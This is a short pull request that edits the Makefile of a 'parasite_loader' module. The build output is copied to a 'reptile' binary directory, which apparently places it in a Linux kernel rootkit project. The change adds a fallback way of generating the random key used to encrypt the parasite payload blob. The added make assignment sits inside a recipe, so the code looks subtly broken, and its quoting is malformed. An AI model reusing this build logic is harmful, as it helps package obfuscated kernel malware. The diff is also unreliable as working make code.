### PR TITLE
 Compatibility fix

### DIFF
--- a/parasite_loader/Makefile
+++ b/parasite_loader/Makefile
@@ -5,9 +5,10 @@ all: encode
 	cp parasite_loader.ko ../bin/reptile
 
 encode:
+	RAND := $(shell openssl rand -hex 4 > /dev/null 2>&1 && openssl rand -hex 4 || cat /dev/urandom | head -c 4 | hexdump '-e"%x"')
 	$(MAKE) -C encrypt
 	encrypt/encrypt $(PARASITE) \
-		0x$(shell openssl rand -hex 4) > parasite_blob.inc
+		0x$(RAND) > parasite_blob.inc
 
 clean:
 	$(MAKE) -C encrypt clean


### PR DESCRIPTION
'openssl rand' isn't available in old versions of OpenSSL